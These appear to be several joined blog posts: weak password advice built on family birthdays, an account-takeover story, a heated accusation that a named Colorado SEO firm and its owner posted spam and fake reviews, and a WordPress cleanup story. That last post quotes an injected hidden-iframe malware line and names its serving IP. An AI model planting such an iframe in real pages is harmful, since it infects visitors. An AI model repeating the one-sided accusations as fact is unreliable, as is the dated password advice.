“My son Joe was born on May 10, 2000″ and the password becomes, MsJwboM102000 – get it?
You might choose to just use the last two digits for the year, or perhaps all four, but use a pattern that you can remember.
Use your wifes birthday, or something else that you could NEVER forget, and make sure to use at least two capital letters and at least two numbers.
If you want it truly unique for each website, and even more secure, you could try also adding the first letter of the domain you’re logging into.
# and $ signs and a few other characters are secure too, but keep in mind that some servers won’t accept them.
I’ll wait here while you go change your passwords right now, because believe me, someone really IS trying to get in your account, and maybe they’re trying right now!
*** Update March 2010***
My friends sister just found out that she was locked out of her hotmail account, and after a few minutes she realized she was locked out of her bank account too, and a couple of others. someone had apparently gained access to her mail account, so I got a panicked call.
Her password was a simple one, and with it, they changed her security questions in case she noticed, then they reset passwords elsewhere, (since they had control of her email account for verification they could do that!), and as of this writing, she’s on the phone with US Bank after about 20 minutes of digging to find this link at Microsoft which led to this Microsoft account recovery form.
Change your passwords NOW.
Peak Studios is a “search marketing firm” in Colorado that deserves special recognition for being incredibly stupid. Apparently, they’ve decided to leave fake negative reviews on my local business profile in Google, and they’ve done the same thing to several other members of the SEMpdx board of directors.
The owner, Quince Wyss, has now moved from a simple ignorance about marketing tactics into complete and total idiocy, and I’m sharing the story here because he’s crossed the line with these personal attacks.
The Story:
Back in October, someone posted twice in a row at the SEMpdx forums with two poorly written self promotional articles that were not only poorly written, but also had embarrassingly bad formatting, grammar, and punctuation.
As a forum moderator, I was just going to delete them when I noticed something comical – The “service” being hawked in these two pieces of junk were for an SEO / SEM company in Colorado named Peak Studios.
The person that posted even left their name, company name, and their email address, website and phone number, on both of these ridiculous “contruibutions”.
First I laughed, and then I Twittered this – “If you were an SEO company, would you forumspam us at SEMpdx? Duh. So, I’m calling [unlinked here] Peakstudios.com and I’ll report back”.
I realized it might just be someone trying to make Peak Studios look bad, so I decided to phone the company and alert them to what had been done.
How Did Peak Studios React?
You can imagine my surprise when the owner, Quince Wyss, told me that they DID have an employee with that name, and Quince said he wanted to see what the employee had written.
I forwarded the “articles” to him by email, expecting to get a message back that he was embarrassed and sorry, and that the employee would undergo some training about what is and isn’t appropriate. Certainly he’d train him more about how they want to portray themselves in the public eye, right?
I hung up thinking I had done a good deed, but an hour later I got an email back from him actually defending this crap, and he also “demanded” that I retract what I had said on Twitter!
Well, never one to miss an opportunity, I wrote an article called “Forum Spam is in the Eye of the Beholder” and posted on the SEMpdx blog, calling out Peak Studios by name as defending the practice of spamming forums.
Todd Mintz submitted it to Sphinn, where agreement was nearly 100% that this guy was in the wrong. Well known and respected internet marketers like Jill Whalen, John Andrews, Daria Goetsch, Nick Wilsdon, Kim (Krause) Berg and many others all seemed to agree that yeah, it was totally inappropriate.
But after seeing the internet community lined up against him, did Quince Wyss see the error of his ways and do the right thing and apologize?
No – of course not. Peak Studios continued to argue the point as the only defender on the thread, Opiumden. The debate got so ridiculous that commenting was turned off by adnimistrators.
Was that the end of it?
Oh no, not by a long shot. This genius then actually phoned both Kent Lewis, the past president at SEMpdx, and Ben Lloyd, the current president, and “demanded” that my article be removed, threatening lawsuits, retaliation, and blah blah blah.
Quince claimed both that I had edited his “articles to make him look bad” (LOL – why would anyone do that?), and he said that there was “nothing wrong with what he’d done”.
At that point it became even more ridiculous, as several emails went around among the SEMpdx board before we all decided unanimously that the article should stay up.
I mean, here’s a “search marketing firm” engaging in the same exact kind of forum spam that you see for Viagra, but it was for their own industry, their own business, and they were actually DEFENDING it! We all found it incredible.
So, Ben basically told the guy to take a hike and to go ahead and call his lawyer, because we all agreed he was clearly off his tree.
Was that the end? Oh no, just wait, it gets better…
Earlier this week, someone supposedly named “Jesse Vandalino” posted a silly but negative comment about SEMpdx on a very old outdated blog post at Matt McGee’s Small Business Marketing blog.
Matt emailed Todd Mintz and asked him if the name “Jesse Vandalino” rang any bells, which it didn’t, and we all suspected that it might be this guy from Peak Studios trying to engage in some reputation damagement.
Then Friday, someone at the office of Anvil Media noticed a negative review on their Google Maps profile, and Tom Hale, another SEMpdx forum admin and advisory board member ALSO had a negative review added to his Google profile.
I heard about this all on Saturday, and a quick look at my own Google profile turned up the one and only negative review ever written about my company. Sure enough, it too could be tracked back to this bozo at Peak Studios. Here’s a copy, in case I can get it removed…
Why am I writing this now?
Because after seeing this fake review, I was so mad that I picked up the phone and called Peak, leaving a profane voicemail that he should have some balls and call me. What did he do? Did he “man up” and phone me? No.
After editing out his own name, his company name, and the dirty deeds I was accusing him of, he then posted the voicemail on youtube in another public smear attempt. (I guess it serves me right, but I was genuinely pissed!)
That wasn’t enough tough, and he began contacting others, like the East Portland Chamber of Commerce, and linking to the Youtube edited voicemail with more comment spam.
THEN he went back into my Google profile and added another fake review, this one with reference to the voicemail!
If this guy will spam our forum, then go to all the trouble to attack us personally when he’s so clearly wrong in the first place, what might he do for his clients?
I took a look at just the first client listed in their “web portfolio” and here’s a short video of how they “market”, including:
- Making up fake user profiles
- Leaving fake favorable reviews for clients
- Slandering client competitors by leaving fake negative reviews
Here is my proof that they are leaving fake reviews!
What’s the most disturbing is NOT that he’s too stupid to realize that they spammed in the first place.
It’s not even that he’s so dumb that he used the same user accounts making this so easy to uncover.
No, what’s most disturbing is that there are businesses in Colorado that are falling prey to the supposed “internet marketing services” of Quince Wyss at Peak Studios, and they are risking their business reputation .
Don’t take my word for it; check them out for yourself! Here are a few fake user reviews I found for ChemDry carpet cleaning, a Peak Studios client – One, two, three, four
Here’s one where they also did a fake negative review of a competitor, and here’s another fake negative competitor review. Here’s one competitor hit with 5 negative reviews
It’s one thing to engage in some negative smear campaign against me or SEMpdx – we’re big boys & girls and can take care of ourselves.
What they’re doing is posting fake reviews of their own clients, and they’re posting fake negative reviews about their clients competitors! That is SO far over the top that I I think they should be sued.
Only the most despicable company would engage in a negative campaign of actual lies about the competitors of their clients, right?
Do you think their clients have agreed to let them play that way?
Update – 14 months later, Peak Studios is at it again so i’m closing comments here – please go to the new thread…
I was at a friends home a couple of weeks ago, and he was complaining about a virus on his computer. Try as he might, he could not get rid of this virus. I total look and thought I was able to remove it, but he said that the next day it came back.
Ultimately he ended up having a local computer repair person come out, who cleaned up his system and a couple of hours and the problem went away., but today,we talked by phone, and he told me he got the warning again when he viewed his own blog.
I took a look at his blog and here’s what I saw -
Interesting! I recognize the IP address from the file that I couldn’t seem to get rid of while I was visiting, so now we had our culprit. We knew where his virus came from… it came from his own WordPress blog!
At that point I did little bit of research, and found a post on the WordPress support forum talking about this very issue, where it seemed that someone had inserted this code into one of someone else’s old posts.
<!– Traffic Statistics –> <iframe height=”1″ width=”1″ frameBorder=”0″ src=”http://www.wp-stats-XXXphp.info/iframe/wp-stats.XXXphp”></iframe><!– End Traffic Statistics –>
At that point it was a matter of picking through all of his posts manually, and viewing the html code of each one, before finding and deleting it. Of course, in his case, it was found in 8 different posts! It was coming from http://61.155.8.157/iframe/wp-stats.php and was a VBS Malware-gen
Luckily he’s an infrequent poster, but can you imagine how difficult this may have been if there were multiple users posting everyday?
The moral of the story? Moderate your new users, use a secure password, keep your WordPress current (his was not) and watch out for strange e-mail addresses signing up as new users!
